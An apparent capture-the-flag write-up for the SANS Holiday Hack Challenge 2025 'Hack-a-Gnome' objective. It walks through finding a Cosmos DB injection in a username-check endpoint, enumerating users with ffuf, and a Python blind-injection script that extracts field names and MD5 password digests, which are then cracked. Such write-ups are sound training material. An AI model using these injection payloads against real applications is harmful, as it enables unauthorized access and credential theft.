<!DOCTYPE html>
<html lang="en-us" dir="ltr" itemscope itemtype="http://schema.org/Article" data-r-output-format="html">
  <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
    <meta charset="utf-8">
    <meta name="viewport" content="height=device-height, width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <meta name="generator" content="Hugo 0.152.2">
    <meta name="generator" content="Relearn 8.2.0+926ba4d1230e27319cf62da0633eb3420e6af1bf">
    <meta name="description" content="Objective Difficulty: 3/5
Davis in the Data Center is fighting a gnome army—join the hack-a-gnome fun.
Chris Daves mission statement Hi, my name is Chris.
I like miniature war gaming and painting minis.
I enjoy open source projects and amateur robotics.
Hiking and kayaking are my favorite IRL activies.
I love single player video games with great stoylines.
Hey, I could really use another set of eyes on this gnome takeover situation.">
    <meta name="author" content="">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Hack-a-Gnome :: SANS Holiday Hack Challenge 2025">
    <meta name="twitter:description" content="Objective Difficulty: 3/5
Davis in the Data Center is fighting a gnome army—join the hack-a-gnome fun.
Chris Daves mission statement Hi, my name is Chris.
I like miniature war gaming and painting minis.
I enjoy open source projects and amateur robotics.
Hiking and kayaking are my favorite IRL activies.
I love single player video games with great stoylines.
Hey, I could really use another set of eyes on this gnome takeover situation.">
    <meta property="og:url" content="http://localhost:1313/act3/hack-a-gnome/index.html">
    <meta property="og:site_name" content="SANS Holiday Hack Challenge 2025">
    <meta property="og:title" content="Hack-a-Gnome :: SANS Holiday Hack Challenge 2025">
    <meta property="og:description" content="Objective Difficulty: 3/5
Davis in the Data Center is fighting a gnome army—join the hack-a-gnome fun.
Chris Daves mission statement Hi, my name is Chris.
I like miniature war gaming and painting minis.
I enjoy open source projects and amateur robotics.
Hiking and kayaking are my favorite IRL activies.
I love single player video games with great stoylines.
Hey, I could really use another set of eyes on this gnome takeover situation.">
    <meta property="og:locale" content="en_us">
    <meta property="og:type" content="website">
    <meta itemprop="name" content="Hack-a-Gnome :: SANS Holiday Hack Challenge 2025">
    <meta itemprop="description" content="Objective Difficulty: 3/5
Davis in the Data Center is fighting a gnome army—join the hack-a-gnome fun.
Chris Daves mission statement Hi, my name is Chris.
I like miniature war gaming and painting minis.
I enjoy open source projects and amateur robotics.
Hiking and kayaking are my favorite IRL activies.
I love single player video games with great stoylines.
Hey, I could really use another set of eyes on this gnome takeover situation.">
    <meta itemprop="datePublished" content="2025-11-30T11:47:39+01:00">
    <meta itemprop="dateModified" content="2025-11-30T11:47:39+01:00">
    <meta itemprop="wordCount" content="745">
    <title>Hack-a-Gnome :: SANS Holiday Hack Challenge 2025</title>
    <link href="/act3/hack-a-gnome/index.xml" rel="alternate" type="application/rss+xml" title="Hack-a-Gnome :: SANS Holiday Hack Challenge 2025">
    <link href="/css/auto-complete/auto-complete.min.css?1765213734" rel="stylesheet">
    <script src="/js/auto-complete/auto-complete.min.js?1765213734" defer></script>
    <script src="/js/search-lunr.js?1765213734" defer></script>
    <script src="/js/search.js?1765213734" defer></script>
    <script>
      window.relearn = window.relearn || {};
      window.relearn.index_js_url="/searchindex.en.js?1765213734";
    </script>
    <script src="/js/lunr/lunr.min.js?1765213734" defer></script>
    <script src="/js/lunr/lunr.stemmer.support.min.js?1765213734" defer></script>
    <script src="/js/lunr/lunr.multi.min.js?1765213734" defer></script>
    <script src="/js/lunr/lunr.en.min.js?1765213734" defer></script>
    <script>
      window.relearn = window.relearn || {};
      window.relearn.contentLangs=['en'];
    </script>
    <link href="/fonts/fontawesome/css/fontawesome-all.min.css?1765213734" rel="stylesheet" media="print" onload="this.media='all';this.onload=null;"><noscript><link href="/fonts/fontawesome/css/fontawesome-all.min.css?1765213734" rel="stylesheet"></noscript>
    <link href="/css/perfect-scrollbar/perfect-scrollbar.min.css?1765213734" rel="stylesheet">
    <link href="/css/theme.css?1765213734" rel="stylesheet">
    <link href="/css/format-html.css?1765213734" rel="stylesheet" id="R-format-style">
    <script>
      window.relearn = window.relearn || {};
      // configuration
      window.relearn.min = ``;
      window.relearn.path='\/act3\/hack-a-gnome\/index.html';
      window.relearn.relBasePath='..\/..';
      window.relearn.relBaseUri='..\/..';
      window.relearn.absBaseUri='http:\/\/localhost:1313';
      window.relearn.disableAnchorCopy=false;
      window.relearn.disableAnchorScrolling=false;
      window.relearn.disableInlineCopyToClipboard=false;
      window.relearn.enableBlockCodeWrap=true;
      // legal
      window.relearn.getItem = (s,n) => {return s.getItem(n)};
      window.relearn.setItem = (s,n,v) => {return s.setItem(n,v)};
      window.relearn.removeItem = (s,n) => {return s.removeItem(n)};
      // translations
      window.T_Copy_to_clipboard = `Copy to clipboard`;
      window.T_Copied_to_clipboard = `Copied to clipboard!`;
      window.T_Copy_link_to_clipboard = `Copy link to clipboard`;
      window.T_Link_copied_to_clipboard = `Copied link to clipboard!`;
      window.T_Reset_view = `Reset view`;
      window.T_View_reset = `View reset!`;
      window.T_No_results_found = `No results found for "{0}"`;
      window.T_N_results_found = `{1} results found for "{0}"`;
      // variant stuff
      window.relearn.themevariants = [ 'hhc-2025' ];
      window.relearn.customvariantname = "my-custom-variant";
      window.relearn.changeVariant = function(variant) {
        var oldVariant = document.documentElement.dataset.rThemeVariant;
        window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        document.documentElement.dataset.rThemeVariant = variant;
        if (oldVariant != variant) {
          document.dispatchEvent( new CustomEvent('themeVariantLoaded', { detail: { variant, oldVariant } }) );
          window.relearn.markVariant();
        }
      }
      window.relearn.markVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant");
        document.querySelectorAll(".R-variantswitcher select").forEach((select) => {select.value = variant;});
      }
      window.relearn.initVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant") ?? "";
        if( variant == window.relearn.customvariantname ){
        }else if( !variant || !window.relearn.themevariants.includes(variant) ){
          variant = window.relearn.themevariants[0];
          window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        }
        document.documentElement.dataset.rThemeVariant = variant;
      }
      window.relearn.initVariant();
      window.relearn.markVariant();
    </script>
  </head>
  <body class="mobile-support html" data-url="/act3/hack-a-gnome/index.html">
    <div id="R-body" class="default-animation">
      <div id="R-body-overlay"></div>
      <nav id="R-topbar">
        <div class="topbar-wrapper">
          <div class="topbar-sidebar-divider"></div>
          <div class="topbar-area topbar-area-start" data-area="start">
            <div class="topbar-button topbar-button-sidebar" data-content-empty="disable" data-width-s="show" data-width-m="hide" data-width-l="hide">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleNav()" type="button" title="Menu (CTRL&#43;ALT&#43;n)"><i class="fa-fw fas fa-bars"></i></button></span>
            </div>
            <div class="topbar-button topbar-button-toc" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="Table of Contents (CTRL&#43;ALT&#43;t)"><i class="fa-fw fas fa-list-alt"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
<nav class="TableOfContents">
  <ul>
    <li><a href="#objective">Objective</a></li>
    <li><a href="#chris-daves-mission-statement">Chris Daves mission statement</a></li>
    <li><a href="#solution">Solution</a>
      <ul>
        <li><a href="#inspecting-javascript">Inspecting Javascript</a></li>
        <li><a href="#identifying-the-database">Identifying the database</a></li>
        <li><a href="#finding-usernames">Finding usernames</a></li>
        <li><a href="#enumerating-the-database">Enumerating the database</a></li>
        <li><a href="#logging-in">Logging in</a></li>
      </ul>
    </li>
    <li><a href="#chris-davis-mission-debrief">Chris Davis mission debrief</a></li>
  </ul>
</nav>
                </div>
              </div>
            </div>
          </div>
          <ol class="topbar-breadcrumbs breadcrumbs highlightable" itemscope itemtype="http://schema.org/BreadcrumbList"><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/index.html"><span itemprop="name">Intro</span></a><meta itemprop="position" content="1">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/act3/index.html"><span itemprop="name">Act 3</span></a><meta itemprop="position" content="2">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><span itemprop="name">Hack-a-Gnome</span><meta itemprop="position" content="3"></li>
          </ol>
          <div class="topbar-area topbar-area-end" data-area="end">
            <div class="topbar-button topbar-button-prev" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act3/gnome-tea/index.html" title="Gnome Tea (🡐)"><i class="fa-fw fas fa-chevron-left"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-next" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act3/snowcat-rce-and-priv-esc/index.html" title="Snowcat RCE & Priv Esc (🡒)"><i class="fa-fw fas fa-chevron-right"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-more" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="More"><i class="fa-fw fas fa-ellipsis-v"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
                  <div class="topbar-area topbar-area-more" data-area="more">
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </nav>
      <div id="R-main-overlay"></div>
      <main id="R-body-inner" class="highlightable act3" tabindex="-1">
        <div class="flex-block-wrapper">
<article class="default">
  <header class="headline">
  </header>

<h1 id="hack-a-gnome">Hack-a-Gnome</h1>

<p><a href="#R-image-9e288aa0129ecf7519dac2dd277f7adc" class="lightbox-link"><img alt="Chris Daves" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/chrisdavis-avatar.gif" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-9e288aa0129ecf7519dac2dd277f7adc"><img alt="Chris Daves" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/chrisdavis-avatar.gif"></a></p>
<h2 id="objective">Objective</h2>
<p>Difficulty: 3/5</p>
<p>Davis in the Data Center is fighting a gnome army—join the hack-a-gnome fun.</p>
<h2 id="chris-daves-mission-statement">Chris Daves mission statement</h2>
<blockquote>
<p>Hi, my name is Chris.</p>
<p>I like miniature war gaming and painting minis.</p>
<p>I enjoy open source projects and amateur robotics.</p>
<p>Hiking and kayaking are my favorite IRL activies.</p>
<p>I love single player video games with great stoylines.</p>
<hr>
<p>Hey, I could really use another set of eyes on this gnome takeover situation.</p>
<p>Their systems have multiple layers of protection now - database authentication, web application vulnerabilities, and more!</p>
<p>But every system has weaknesses if you know where to look.</p>
<p>If these gnomes freeze the whole neighborhood, forget about hiking or kayaking—everything will be one giant ice rink. And trust me, miniature war gaming is a lot less fun when your paint freezes solid.</p>
<p>Ready to help me turn one of these rebellious bots against its own kind?</p>
</blockquote>
<h2 id="solution">Solution</h2>
<p>URL <a href="https://hhc25-smartgnomehack-prod.holidayhackchallenge.com" rel="external">https://hhc25-smartgnomehack-prod.holidayhackchallenge.com</a></p>
<h3 id="inspecting-javascript">Inspecting Javascript</h3>
<p>By inspecting the HTML source of the mainpage we find an interesting Javascript file, <code>https://hhc25-smartgnomehack-prod.holidayhackchallenge.com/static/script.js</code>. By reading it we get to know a few interesting endpoints</p>
<table>
  <thead>
      <tr>
          <th>Endpoint</th>
          <th>Description</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>/register</td>
          <td>Endpoint for registering a new user</td>
      </tr>
      <tr>
          <td>/userAvailable?username=</td>
          <td>In use to check wheter a username is available for registion upon creating a new user</td>
      </tr>
  </tbody>
</table>
<h3 id="identifying-the-database">Identifying the database</h3>
<p>We identified the endpoints above, and the only endpoint taking arguments seems to be the <code>userAvailable</code> one. We were able to provoke an error message by sending in an <code>&quot;</code> to the this endpoint:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>https://hhc25-smartgnomehack-prod.holidayhackchallenge.com/userAvailable?username<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span></span></span></code></pre></div>
<p>Output:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;error&#34;</span>:<span style="color:#e6db74">&#34;An error occurred while checking username: Message: {\&#34;errors\&#34;:[{\&#34;severity\&#34;:\&#34;Error\&#34;,\&#34;location\&#34;:{\&#34;start\&#34;:44,\&#34;end\&#34;:45},\&#34;code\&#34;:\&#34;SC1012\&#34;,\&#34;message\&#34;:\&#34;Syntax error, invalid string literal token &#39;\\\&#34;&#39;.\&#34;}]}\r\nActivityId: fc87623e-4f9b-4d3d-9b18-f56fefa1b5d9, Microsoft.Azure.Documents.Common/2.14.0&#34;</span>}</span></span></code></pre></div>
<p>After a quick check using ChatGPT, it appears we are dealing with <code>Cosmos DB</code> here.</p>
<h3 id="finding-usernames">Finding usernames</h3>
<p>For this segment we were provided with the following hint from the hint system:</p>
<blockquote>
<p>Once you determine the type of database the gnome control factory&rsquo;s login is using, look up its documentation on default document types and properties. This information could help you generate a list of common English first names to try in your attack.</p>
</blockquote>
<p>This seems straight forward. Just grab a list of names and fuzz away:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -u https://hhc25-smartgnomehack-prod.holidayhackchallenge.com/userAvailable?username<span style="color:#f92672">=</span>FUZZ -X GET -fr <span style="color:#e6db74">&#34;true&#34;</span></span></span></code></pre></div>
<p>We quickly identify the following users:</p>
<ul>
<li>bruce</li>
<li>harold</li>
</ul>
<h3 id="enumerating-the-database">Enumerating the database</h3>
<p>We don&rsquo;t know Cosmos DB at all. But from looking at syntax examples online, every example seems to go like this:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">SELECT</span> <span style="color:#f92672">*</span> <span style="color:#66d9ef">FROM</span> p <span style="color:#66d9ef">WHERE</span> p.something <span style="color:#f92672">=</span> something</span></span></code></pre></div>
<p>From this we form the following workflow:</p>
<ol>
<li>Identify &ldquo;p&rdquo; - what value could be in use here?</li>
<li>Identify fields in use, Cosmos DB doesn&rsquo;t have a set schema</li>
<li>Extract password, if even possible</li>
</ol>
<p>For this excercise we leave FFUF for now an move on to Python:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> requests
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> urllib.parse
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> string
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> sys
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pprint <span style="color:#f92672">import</span> pprint
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Helper function for injection</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># </span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">inject</span>(base_url: str, payload: str) <span style="color:#f92672">-&gt;</span> str:
</span></span><span style="display:flex;"><span>    url <span style="color:#f92672">=</span> base_url <span style="color:#f92672">+</span> urllib<span style="color:#f92672">.</span>parse<span style="color:#f92672">.</span>quote_plus(payload)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(url)
</span></span><span style="display:flex;"><span>    
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> r<span style="color:#f92672">.</span>json()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Map out prefix</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">find_prefix</span>(url, username):
</span></span><span style="display:flex;"><span>    prefix_letter <span style="color:#f92672">=</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> prefix <span style="color:#f92672">in</span> string<span style="color:#f92672">.</span>ascii_letters:
</span></span><span style="display:flex;"><span>        payload <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">{</span>username<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34; AND IS_DEFINED(</span><span style="color:#e6db74">{</span>prefix<span style="color:#e6db74">}</span><span style="color:#e6db74">.username) --&#39;</span>
</span></span><span style="display:flex;"><span>        result <span style="color:#f92672">=</span> inject(base_url, payload)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;error&#34;</span> <span style="color:#f92672">in</span> result<span style="color:#f92672">.</span>keys():
</span></span><span style="display:flex;"><span>        	<span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        prefix_letter <span style="color:#f92672">=</span> prefix
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> prefix_letter
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Find password field name</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">find_password_field</span>(url, username, prefix):
</span></span><span style="display:flex;"><span>	fields <span style="color:#f92672">=</span> []
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">&#34;burp-parameter-names.txt&#34;</span>, <span style="color:#e6db74">&#34;r&#34;</span>) <span style="color:#66d9ef">as</span> f:
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">for</span> line <span style="color:#f92672">in</span> f<span style="color:#f92672">.</span>readlines():
</span></span><span style="display:flex;"><span>			needle <span style="color:#f92672">=</span> line<span style="color:#f92672">.</span>strip(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>			payload <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">{</span>username<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34; AND IS_DEFINED(</span><span style="color:#e6db74">{</span>prefix<span style="color:#e6db74">}</span><span style="color:#e6db74">.</span><span style="color:#e6db74">{</span>needle<span style="color:#e6db74">}</span><span style="color:#e6db74">) --&#39;</span>
</span></span><span style="display:flex;"><span>			result <span style="color:#f92672">=</span> inject(url, payload)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>			<span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;error&#34;</span> <span style="color:#f92672">in</span> result<span style="color:#f92672">.</span>keys():
</span></span><span style="display:flex;"><span>				<span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>			<span style="color:#66d9ef">if</span> result<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#34;available&#34;</span>) <span style="color:#f92672">is</span> <span style="color:#66d9ef">False</span>:
</span></span><span style="display:flex;"><span>				fields<span style="color:#f92672">.</span>append(needle)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">return</span> fields
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Find digest</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># </span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">find_digest</span>(base_url, prefix, candidate<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span>, username<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span>):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> string<span style="color:#f92672">.</span>ascii_lowercase <span style="color:#f92672">+</span> string<span style="color:#f92672">.</span>digits <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;-&#34;</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> c <span style="color:#f92672">in</span> [<span style="color:#e6db74">&#34;:&#34;</span>]:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        p <span style="color:#f92672">=</span> candidate <span style="color:#f92672">+</span> c
</span></span><span style="display:flex;"><span>        
</span></span><span style="display:flex;"><span>        payload <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">{</span>username<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34; AND STARTSWITH(</span><span style="color:#e6db74">{</span>prefix<span style="color:#e6db74">}</span><span style="color:#e6db74">.digest, &#34;</span><span style="color:#e6db74">{</span>p<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;) --&#39;</span>
</span></span><span style="display:flex;"><span>        result <span style="color:#f92672">=</span> inject(base_url, payload)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        print(payload)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> result[<span style="color:#e6db74">&#34;available&#34;</span>] <span style="color:#f92672">is</span> <span style="color:#66d9ef">False</span>:
</span></span><span style="display:flex;"><span>            print(p)
</span></span><span style="display:flex;"><span>            find_digest(base_url, prefix, p, username)
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">break</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Main logic</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span>base_url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://hhc25-smartgnomehack-prod.holidayhackchallenge.com/userAvailable?username=&#34;</span>
</span></span><span style="display:flex;"><span>prefix <span style="color:#f92672">=</span> find_prefix(base_url, <span style="color:#e6db74">&#34;harold&#34;</span>)
</span></span><span style="display:flex;"><span>fields <span style="color:#f92672">=</span> find_password_field(base_url, <span style="color:#e6db74">&#34;harold&#34;</span>, prefix)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;Prefix is: </span><span style="color:#e6db74">{prefix}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;Document fields is: &#34;</span>)
</span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">*&#34;</span><span style="color:#f92672">.</span>join(fields))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>find_digest(base_url, prefix, <span style="color:#e6db74">&#34;&#34;</span>, <span style="color:#e6db74">&#34;harold&#34;</span>)
</span></span><span style="display:flex;"><span>find_digest(base_url, prefix, <span style="color:#e6db74">&#34;&#34;</span>, <span style="color:#e6db74">&#34;bruce&#34;</span>)</span></span></code></pre></div>
<p>From running this script we learn that</p>
<p>The <code>p</code> we were looking for is actually <code>c</code>. Furhter we identiy the following document fields:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>ID
</span></span><span style="display:flex;"><span>Id
</span></span><span style="display:flex;"><span>USERNAME
</span></span><span style="display:flex;"><span>UserName
</span></span><span style="display:flex;"><span>Username
</span></span><span style="display:flex;"><span>digest
</span></span><span style="display:flex;"><span>id
</span></span><span style="display:flex;"><span>userName
</span></span><span style="display:flex;"><span>username</span></span></code></pre></div>
<p>There are no &ldquo;password&rdquo; field, however we identify a <code>digest</code> field, which kinda is the same thing. Moving on we bruteforce the <code>digest</code> field for the two users we have found, and this is what we got:</p>
<table>
  <thead>
      <tr>
          <th>Username</th>
          <th>Digest (MD5)</th>
          <th>Decoded</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>bruce</td>
          <td>d0a9ba00f80cbc56584ef245ffc56b9e</td>
          <td>oatmeal12</td>
      </tr>
      <tr>
          <td>harold</td>
          <td>07f456ae6a94cb68d740df548847f459</td>
          <td>oatmeal!!</td>
      </tr>
  </tbody>
</table>
<p>The digest (passwords) are stored as MD5 - by simply visiting <a href="https://crackstation.net" rel="external">Crackstation</a> we easily decode them</p>
<h3 id="logging-in">Logging in</h3>
<h2 id="chris-davis-mission-debrief">Chris Davis mission debrief</h2>
<blockquote>
</blockquote>

  <footer class="footline">
              <i class='fa-fw fas fa-calendar'></i> Nov 30, 2025
  </footer>
</article>
        </div>
      </main>
    </div>
    <aside id="R-sidebar" class="default-animation">
      <div id="R-header-topbar" class="default-animation"></div>
      <div id="R-header-wrapper" class="default-animation">
        <div id="R-header" class="default-animation">
          <a id="R-logo" class="R-default" href="/index.html">
            <div class="logo-title">SANS Holiday Hack Challenge 2025</div>
          </a>
        </div>
        <search><form action="/search/index.html" method="get">
          <div class="searchbox default-animation">
            <button class="search-detail" type="submit" title="Search (CTRL+ALT+f)"><i class="fas fa-search"></i></button>
            <label class="a11y-only" for="R-search-by">Search</label>
            <input data-search-input id="R-search-by" name="search-by" class="search-by" type="search" placeholder="Search...">
            <button class="search-clear" type="button" data-search-clear="" title="Clear search"><i class="fas fa-times" title="Clear search"></i></button>
          </div>
        </form></search>
      </div>
      <div id="R-homelinks" class="default-animation homelinks">
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-homelinks">
          <ul class="space collapsible-menu">
            <li class="" data-nav-url="/index.html"><a class="padding" href="/index.html"><i class="fa-fw fas fa-home"></i> Home</a></li>
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-headercontrols">
          <ul class="">
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
      </div>
      <div id="R-content-wrapper" class="highlightable">
        <div class="R-sidebarmenu R-shortcutmenu-main">
          <ul class="enlarge morespace collapsible-menu">
            <li class="" data-nav-url="/act1/index.html"><a class="padding" href="/act1/index.html">Act 1</a><ul id="R-subsections-8dc0c36ceefa45529ff4cf1f9bdc1f66" class="collapsible-menu"></ul></li>
            <li class="" data-nav-url="/act2/index.html"><a class="padding" href="/act2/index.html">Act 2</a><ul id="R-subsections-9d3d8c898368693a495088de36411fa6" class="collapsible-menu"></ul></li>
            <li class="parent " data-nav-url="/act3/index.html"><a class="padding" href="/act3/index.html">Act 3</a><ul id="R-subsections-0b6215c9fad834351813cc2ad0d4a335" class="collapsible-menu">
            <li class="" data-nav-url="/act3/gnome-tea/index.html"><a class="padding" href="/act3/gnome-tea/index.html">Gnome Tea</a></li>
            <li class="active " data-nav-url="/act3/hack-a-gnome/index.html"><a class="padding" href="/act3/hack-a-gnome/index.html">Hack-a-Gnome</a></li>
            <li class="" data-nav-url="/act3/snowcat-rce-and-priv-esc/index.html"><a class="padding" href="/act3/snowcat-rce-and-priv-esc/index.html">Snowcat RCE &amp; Priv Esc</a></li>
            <li class="" data-nav-url="/act3/schrodingers-scope/index.html"><a class="padding" href="/act3/schrodingers-scope/index.html">Schrödingers Scope</a></li>
            <li class="" data-nav-url="/act3/find-and-shutdown-frostys-snowglobe-machine/index.html"><a class="padding" href="/act3/find-and-shutdown-frostys-snowglobe-machine/index.html">Find and Shutdown Frostys Snowglobe Machine</a></li>
            <li class="" data-nav-url="/act3/on-the-wire/index.html"><a class="padding" href="/act3/on-the-wire/index.html">On the Wire</a></li>
            <li class="" data-nav-url="/act3/free-ski/index.html"><a class="padding" href="/act3/free-ski/index.html">Free Ski</a></li></ul></li>
          </ul>
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-shortcuts">
          <ul class="space collapsible-menu">
          </ul>
        </div>
        <div id="R-footer-margin"></div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-footercontrols">
          <ul class="">
          </ul>
        </div>
<div id="R-footer"><p>Built with <a href="https://github.com/McShelby/hugo-theme-relearn" title="love"><i class="fas fa-heart"></i></a> by <a href="https://gohugo.io/">Hugo</a></p></div>
      </div>
    </aside>
